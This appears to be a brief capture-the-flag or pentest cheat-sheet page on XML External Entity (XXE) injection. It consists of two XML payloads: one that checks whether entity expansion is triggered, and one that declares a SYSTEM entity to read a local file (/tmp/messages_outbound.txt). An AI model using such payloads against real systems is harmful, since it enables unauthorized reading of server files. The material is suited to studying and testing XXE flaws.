XXE
XML External Entity
Determine if XXE is triggered:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe "haha, this is xxe!">]>
<letter>
<from>0x90skids</from>
<return_addr>return_addr</return_addr>
<name>&xxe;</name>
<addr>addr</addr>
<message>message</message>
</letter>This is for LFI:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///tmp/messages_outbound.txt">]>
<letter>
<from>0x90skids</from>
<return_addr>return_addr</return_addr>
<name>&xxe;</name>
<addr>addr</addr>
<message>message</message>
</letter>Last updated